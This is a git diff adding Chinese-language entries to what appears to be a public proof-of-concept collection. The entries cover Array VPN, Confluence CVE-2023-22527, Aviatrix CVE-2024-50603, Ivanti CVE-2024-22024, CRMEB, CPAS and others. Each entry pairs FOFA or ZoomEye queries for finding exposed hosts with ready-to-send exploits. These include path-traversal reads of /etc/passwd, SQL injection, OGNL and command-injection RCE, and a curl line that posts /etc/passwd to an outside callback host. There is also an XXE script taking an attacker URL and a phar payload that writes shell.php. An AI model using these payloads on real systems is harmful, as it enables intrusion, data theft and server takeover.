+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: keep-alive
+Content-Length: 98
+
+["127.0.0.1| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW
+```
+
+![1726293935346-e551c4a1-2a2b-4c39-9442-7b5fb3509fc8.png](./img/f_WgzfyB4eIEXb7f/1726293935346-e551c4a1-2a2b-4c39-9442-7b5fb3509fc8-517338.png)
+
+
+
+
+
+> 更新: 2024-10-22 09:40:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvbg0a36xeft22g9>
\ No newline at end of file
diff --git a/Array-VPN任意文件读取漏洞.md b/Array-VPN任意文件读取漏洞.md
new file mode 100644
index 0000000..b6ccd0f
--- /dev/null
+++ b/Array-VPN任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+## Array VPN任意文件读取漏洞
+
+## fofa
+```
+product="Array-VPN"
+```
+
+
+## poc
+```
+GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
+Dnt: 1
+Upgrade-Insecure-Requests: 1
+Connection: close
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/a6915f3f-2242-4d1d-b3a3-9ff452439cbc)
diff --git a/ArrayVPN存在任意文件读取漏洞.md b/ArrayVPN存在任意文件读取漏洞.md
new file mode 100644
index 0000000..5bbc0d1
--- /dev/null
+++ b/ArrayVPN存在任意文件读取漏洞.md
@@ -0,0 +1,36 @@
+# Array VPN存在任意文件读取漏洞
+
+# 一、漏洞简介
+Array SSL VPN远程安全接入软件具备远程安全接入网关的全部功能，可以在虚拟化或云环境中提供专业的远程安全访问；它帮助用户实现在任何时间任何地点使用任何设备都可以安全地连接到云上的主机或应用。Array的 fshare_template 接口存在任意文件读取漏洞
+
+# 二、影响版本
++ Array VPN
+
+# 三、资产测绘
++ fofa`product="Array-VPN"`
++ 特征
+
+![1725779477080-0973a873-2c5d-4d34-a754-45b9db9c8553.png](./img/A05OLfyJgWII4Te6/1725779477080-0973a873-2c5d-4d34-a754-45b9db9c8553-671397.png)
+
+# 四、漏洞复现
+```java
+GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
+Dnt: 1
+Upgrade-Insecure-Requests: 1
+Connection: close
+```
+
+![1725779502203-97c419b2-7ba4-4ac3-b00d-d3586b64031e.png](./img/A05OLfyJgWII4Te6/1725779502203-97c419b2-7ba4-4ac3-b00d-d3586b64031e-922332.png)
+
+![1725779512607-983887f4-4a8a-4777-a2f4-359819387b3b.png](./img/A05OLfyJgWII4Te6/1725779512607-983887f4-4a8a-4777-a2f4-359819387b3b-741809.png)
+
+
+
+> 更新: 2024-10-22 09:40:55  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gxbmavs2hmreimvi>
\ No newline at end of file
diff --git a/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md b/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md
new file mode 100644
index 0000000..fb0972c
--- /dev/null
+++ b/ArrisTR3300路由器basic_sett存在未授权信息泄露漏洞.md
@@ -0,0 +1,33 @@
+# Arris TR3300路由器basic_sett存在未授权信息泄露漏洞
+
+# 一、漏洞简介
+Arris TR3300路由器basic_sett存在未授权信息泄露漏洞
+
+# 二、影响版本
++ Arris路由器
+
+# 三、资产测绘
++ fofa`body="base64encode(document.tF.pws.value)" || body="ARRIS TR3300"`
++ 特征
+
+![1716312584374-f0336037-460d-4dea-906c-64bdfc4f4c2e.png](./img/teksQfdjF22G8qcp/1716312584374-f0336037-460d-4dea-906c-64bdfc4f4c2e-875869.png)
+
+# 四、漏洞复现
+```plain
+/basic_sett.html
+```
+
+密码泄露：
+
+![1716312848098-bd944f8e-fbeb-4124-8091-eef498dbb93f.png](./img/teksQfdjF22G8qcp/1716312848098-bd944f8e-fbeb-4124-8091-eef498dbb93f-941455.png)
+
+base64解密后登录系统
+
+![1716312869564-ba0d97cd-cf30-427f-a3f2-43bed255913d.png](./img/teksQfdjF22G8qcp/1716312869564-ba0d97cd-cf30-427f-a3f2-43bed255913d-659160.png)
+
+![1716312948463-4d0f810a-8bc3-4ae0-983f-1a7ba7a195d3.png](./img/teksQfdjF22G8qcp/1716312948463-4d0f810a-8bc3-4ae0-983f-1a7ba7a195d3-124062.png)
+
+
+
+> 更新: 2024-05-23 13:30:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bts33znxgp7g76vr>
\ No newline at end of file
diff --git a/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md b/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md
new file mode 100644
index 0000000..9c78561
--- /dev/null
+++ b/Atlassian-Confluence-远程代码执行漏洞(CVE-2023-22527).md
@@ -0,0 +1,97 @@
+## Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
+
+在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。
+
+## poc
+```
+POST /template/aui/text-inline.vm HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: /
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+
+label=test\u0027%2b#{3*33}%2b\u0027
+```
+
+## exp
+```
+POST /template/aui/text-inline.vm HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 285
+
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+```
+
+回显在body exp
+```
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter.write((new+freemarker.template.utility.Execute()).exec({"id"}))
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461)
+
+## nuclei
+```
+id: CVE-2023-22527
+
+info:
+  name: Atlassian Confluence - Remote Code Execution
+  author: iamnooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
+    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
+  reference:
+    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
+    - https://jira.atlassian.com/browse/CONFSERVER-93833
+    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2023-22527
+    epss-score: 0.00044
+    epss-percentile: 0.08115
+    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: atlassian
+    product: confluence_data_center
+    shodan-query: http.component:"Atlassian Confluence"
+  tags: cve,cve2023,confluence,rce,ssti
+
+http:
+  - raw:
+      - |+
+        POST /template/aui/text-inline.vm HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate, br
+        Content-Type: application/x-www-form-urlencoded
+
+        label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Empty{name='
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - dns
+```
+## 漏洞来源
+- https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
+- https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
+- https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md
diff --git a/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md b/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md
new file mode 100644
index 0000000..c339d18
--- /dev/null
+++ b/Aviatrix未授权远程代码执行漏洞(CVE-2024-50603).md
@@ -0,0 +1,81 @@
+# Aviatrix未授权远程代码执行漏洞(CVE-2024-50603)
+
+在 7.1.4191 之前的 Aviatrix Controller 和 7.2.4996 之前的 7.2.x 中发现了问题。由于操作系统命令中使用的特殊元素的中和不当，未经身份验证的攻击者能够执行任意代码。 Shell 元字符可以发送到 cloud_type 中的 /v1/api（对于 list_flightpath_destination_instances），或者发送到 src_cloud_type（对于 Flightpath_connection_test）。
+
+## zoomeye
+
+```javascript
+app="Aviatrix Controller"
+```
+
+## poc
+
+```yaml
+id: CVE-2024-50603
+
+info:
+  name: Aviatrix Controller - Remote Code Execution
+  author: newlinesec,securing.pl
+  severity: critical
+  description: |
+    An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
+  reference:
+    - https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-50603
+    - https://docs.aviatrix.com/documentation/latest/network-security/index.html
+    - https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2024-50603
+    cwe-id: CWE-78
+    epss-score: 0.00046
+    epss-percentile: 0.1845
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: aviatrix
+    product: controller
+    shodan-query:
+      - http.title:"aviatrix controller"
+      - http.title:"aviatrix cloud controller"
+    fofa-query:
+      - app="aviatrix-controller"
+      - title="aviatrix cloud controller"
+    google-query: intitle:"aviatrix cloud controller"
+    zoomeye-query: app="Aviatrix Controller"
+  tags: cve,cve2024,aviatrix,controller,rce,oast
+
+variables:
+  oast: "{{interactsh-url}}"
+
+http:
+  - raw:
+      - |
+        POST /v1/api HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - 'root:.*:0:0:'
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/projectdiscovery/nuclei-templates/pull/11460/files
\ No newline at end of file
diff --git a/C-Lodop打印服务系统存在任意文件读取漏洞.md b/C-Lodop打印服务系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..dec0aee
--- /dev/null
+++ b/C-Lodop打印服务系统存在任意文件读取漏洞.md
@@ -0,0 +1,27 @@
+# C-Lodop打印服务系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+C-Lodop云打印服务器是一款非常好用且受欢迎的专业云打印软件，简单实用，易操作。攻击者可利用此漏洞获取服务器上的任意文件，包括数据库凭据、API密钥、配置文件等，从而获取系统权限和敏感信息。
+
+# 二、影响版本
++ C-Lodop打印服务系统
+
+# 三、资产测绘
++ fofa`"C-Lodop" && icon_hash="-329747115"`
++ 特征
+
+![1708149014735-a271087e-43e2-4581-b58f-bf1ea1c76ccb.png](./img/nMpcvRKOmZw8jtUJ/1708149014735-a271087e-43e2-4581-b58f-bf1ea1c76ccb-469585.png)
+
+# 四、漏洞复现
+```plain
+GET /..././..././..././..././Windows/System32/drivers/etc/hosts HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+```
+
+![1708149061920-15696431-0199-4458-b957-771df9fb1277.png](./img/nMpcvRKOmZw8jtUJ/1708149061920-15696431-0199-4458-b957-771df9fb1277-034670.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cg548zol8agvqu5o>
\ No newline at end of file
diff --git a/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md b/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..de5ea79
--- /dev/null
+++ b/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞
+
+友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+body="/cpasm4/static/cap/font/iconfont.css"
+```
+
+## poc
+```javascript
+POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ
+```
+
+![image-20241227215623148](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272156212.png)
\ No newline at end of file
diff --git a/CPAS审计管理系统存在任意文件读取漏洞.md b/CPAS审计管理系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..9ff0dd8
--- /dev/null
+++ b/CPAS审计管理系统存在任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# CPAS审计管理系统存在任意文件读取漏洞
+
+CPAS审计管理系统存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+icon_hash="-58141038"
+```
+
+## poc
+
+```javascript
+GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
diff --git a/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md b/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md
new file mode 100644
index 0000000..9bc0b5e
--- /dev/null
+++ b/CRMEB任意文件下载漏洞分析(CVE-2024-52726).md
@@ -0,0 +1,35 @@
+## CRMEB任意文件下载漏洞分析(CVE-2024-52726)
+
+app/adminapi/controller/v1/setting/SystemConfig.php路由中存在任意文件下载漏洞
+
+## fofa
+
+```javascript
+icon_hash="-847565074"
+```
+
+## poc
+
+```javascript
+POST /adminapi/setting/config/save_basics HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Authori-zation: 
+Cookie: cb_lang=zh-cn;
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Priority: u=0, i
+Content-Type: application/json;charset=utf-8
+Content-Length: 72
+
+{
+    "weixin_ckeck_file": "../../../../../../../../Windows/win.ini"
+}
+```
+
diff --git a/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md b/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md
new file mode 100644
index 0000000..bc91aee
--- /dev/null
+++ b/CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944).md
@@ -0,0 +1,87 @@
+# CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944)
+
+钟邦科技CRMEB 5.4.0版本中发现一个关键漏洞。受影响的是PublicController.php文件中的get_image_base64函数。参数文件的操作会导致反序列化。攻击可能远程发起。该漏洞已被公开披露并可能被利用。
+
+## fofa
+
+```javascript
+icon_hash="-847565074"
+```
+
+## 漏洞复现
+
+生成phar文件并gzip压缩
+
+```php
+<?php
+
+namespace GuzzleHttp\Cookie{
+
+    class SetCookie {
+
+        function __construct()
+        {
+            $this->data['Expires'] = '<?php phpinfo();?>';
+            $this->data['Discard'] = 0;
+        }
+    }
+
+    class CookieJar{
+        private $cookies = [];
+        private $strictMode;
+        function __construct() {
+            $this->cookies[] = new SetCookie();
+        }
+    }
+
+    class FileCookieJar extends CookieJar {
+        private $filename;
+        private $storeSessionCookies;
+        function __construct() {
+            parent::__construct();
+            $this->filename = "D:/phpstudy/WWW/crmeb/public/shell.php";
+            $this->storeSessionCookies = true;
+        }
+    }
+}
+
+namespace{
+    $exp = new GuzzleHttp\Cookie\FileCookieJar();
+
+    $phar = new Phar('test.phar');
+    $phar -> stopBuffering();
+    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); 
+    $phar -> addFromString('test.txt','test');
+    $phar -> setMetadata($exp);
+    $phar -> stopBuffering();
+    rename('test.phar','test.jpg');
+}
+
+?>
+```
+
+gzip压缩文件
+
+```php
+gzip test.jpg
+```
+
+注册用户上传头像
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941110.png)
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250941888.png)
+
+触发phar反序列化
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942476.png)
+
+成功写入
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410250942596.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/610
\ No newline at end of file
diff --git a/CVE-2024-2044.md b/CVE-2024-2044.md
new file mode 100644
index 0000000..525751d
--- /dev/null
+++ b/CVE-2024-2044.md
@@ -0,0 +1,133 @@
+# pgAdmin4存在反序列化漏洞(CVE-2024-2044)
+
+pgAdmin4存在反序列化漏洞，当pgAdmin4运行在Window平台时攻击者可在无需登陆的情况下构造恶意请求造成远程代码执行。若pgAdmin4运行在Unix平台时，需要先经过身份认证才可触发反序列化造成代码执行。
+
+## fofa
+
+```javascript
+icon_hash="1502815117"
+```
+
+## poc
+
+```python
+#!/usr/bin/env python
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright (C) 2023 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Simple SMB Server example.
+#
+# Author:
+#   Alberto Solino (@agsolino)
+#
+
+import sys
+import argparse
+import logging
+
+from impacket.examples import logger
+from impacket import smbserver, version
+from impacket.ntlm import compute_lmhash, compute_nthash
+
+if __name__ == '__main__':
+
+    # Init the example's logger theme
+    print(version.BANNER)
+
+    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
+                                     "share specified as an argument. You need to be root in order to bind to port 445. "
+                                     "For optional authentication, it is possible to specify username and password or the NTLM hash. "
+                                     "Example: smbserver.py -comment 'My share' TMP /tmp")
+
+    parser.add_argument('shareName', action='store', help='name of the share to add')
+    parser.add_argument('sharePath', action='store', help='path of the share to add')
+    parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
+    parser.add_argument('-username', action="store", help='Username to authenticate clients')
+    parser.add_argument('-password', action="store", help='Password for the Username')
+    parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface')
+    parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
+    parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
+
+    if len(sys.argv)==1:
+        parser.print_help()
+        sys.exit(1)
+
+    try:
+       options = parser.parse_args()
+    except Exception as e:
+       logging.critical(str(e))
+       sys.exit(1)
+
+    logger.init(options.ts)
+
+    if options.debug is True:
+        logging.getLogger().setLevel(logging.DEBUG)
+        # Print the Library's installation path
+        logging.debug(version.getInstallationPath())
+    else:
+        logging.getLogger().setLevel(logging.INFO)
+
+    if options.comment is None:
+        comment = ''
+    else:
+        comment = options.comment
+
+    server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port))
+
+    server.addShare(options.shareName.upper(), options.sharePath, comment)
+    server.setSMB2Support(options.smb2support)
+
+    # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
+    # connections will be allowed
+    if options.username is not None:
+        # we either need a password or hashes, if not, ask
+        if options.password is None and options.hashes is None:
+            from getpass import getpass
+            password = getpass("Password:")
+            # Let's convert to hashes
+            lmhash = compute_lmhash(password)
+            nthash = compute_nthash(password)
+        elif options.password is not None:
+            lmhash = compute_lmhash(options.password)
+            nthash = compute_nthash(options.password)
+        else:
+            lmhash, nthash = options.hashes.split(':')
+
+        server.addCredential(options.username, 0, lmhash, nthash)
+
+    # Here you can set a custom SMB challenge in hex format
+    # If empty defaults to '4141414141414141'
+    # (remember: must be 16 hex bytes long)
+    # e.g. server.setSMBChallenge('12345678abcdef00')
+    server.setSMBChallenge('')
+
+    # If you don't want log to stdout, comment the following line
+    # If you want log dumped to a file, enter the filename
+    server.setLogFile('')
+
+    # Rock and roll
+    server.start()
+```
+
+将 /tmp 文件夹公开为共享 : `python3 smbserver.py -smb2support share /tmp`
+
+
+
+## 漏洞来源
+
+- https://github.com/lal0ne/vulnerability/tree/main/pgadmin4/CVE-2024-2044
+- https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
+
+
+
+
+
diff --git a/CVE-2024-22024.md b/CVE-2024-22024.md
new file mode 100644
index 0000000..c7849d3
--- /dev/null
+++ b/CVE-2024-22024.md
@@ -0,0 +1,102 @@
+# Ivanti Pulse Connect Secure VPN存在XXE漏洞(CVE-2024-22024)
+
+Ivanti Pulse Connect Secure VPN存在XXE漏洞，攻击者可构造恶意请求触发XXE，结合相关功能造成远程代码执行。
+
+## 影响范围
+
+- ivanti connect_secure 22.4
+- ivanti connect_secure 22.5
+- ivanti connect_secure 9.1
+- ivanti policy_secure 22.5
+- ivanti zero_trust_access 22.6
+
+## poc
+
+```python
+import base64
+import requests
+import argparse
+from pathlib import Path
+import urllib3
+from urllib3.exceptions import InsecureRequestWarning
+
+# Suppress only the single InsecureRequestWarning from urllib3
+urllib3.disable_warnings(InsecureRequestWarning)
+
+'''
+	PoC by Abdulla
+	CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
+	Remediation:
+	https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
+'''
+
+def send_request(target_url, attacker_url, timeout):
+    xml_payload_template = """<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>"""
+    xml_payload = xml_payload_template.format(attacker_url + "/test")  # Format with the provided external URL
+    encoded_payload = base64.b64encode(xml_payload.encode()).decode()  # Encode in base64
+    data = {'SAMLRequest': encoded_payload}  # Data for POST request
+    
+    # Attempt the POST request with the specified timeout
+    try:
+        response = requests.post(target_url+"/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout)
+        print(f"Response from {target_url}: {response.status_code}")
+    except requests.exceptions.Timeout:
+        print(f"Request to {target_url} timed out.")
+    except Exception as e:
+        print(f"Error sending request to {target_url}.")
+
+def main(target_urls, attacker_url, timeout):
+    if Path(target_urls).is_file():  # If target_urls is a file path
+        with open(target_urls, 'r') as file:
+            urls = file.read().splitlines()
+            for url in urls:
+                send_request(url, attacker_url, timeout)
+    else:  # Assume target_urls is a single URL
+        send_request(target_urls, attacker_url, timeout)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
+    parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
+    parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
+    parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
+    args = parser.parse_args()
+    
+    main(args.target_url, args.attacker_url, args.timeout)
+
+```
+
+### Parameters
+
+
+
+- `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs.
+- `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site/))
+- `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds)
+
+### How to use
+
+
+
+Testing a single URL:
+
+```
+python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
+```
+
+Testing list of URLs:
+
+```
+python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
+```
+
+Using a different timeout (5 seconds):
+
+```
+python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-22024
\ No newline at end of file
diff --git a/CVE-2024-2561.md b/CVE-2024-2561.md
new file mode 100644
index 0000000..044a7a6
--- /dev/null
+++ b/CVE-2024-2561.md
@@ -0,0 +1,44 @@
+# 74CMS存在任意文件上传漏洞(CVE-2024-2561)
+
+74CMS存在任意文件上传漏洞(CVE-2024-2561)，漏洞地址存在与sendCompanyLogo文件中/controller/company/Index.php#sendCompanyLogo的组件Company Logo Handler。经修改后的参数:imgBase64恶意代码输入可导致rce。
+
+## fofa
+
+```javascript
+app="骑士-74CMS"
+```
+
+## poc
+
+```javascript
+POST /v1_0/company/index/sendCompanyLogo HTTP/1.1
+Host: localhost:7888
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "macOS"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+user-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ
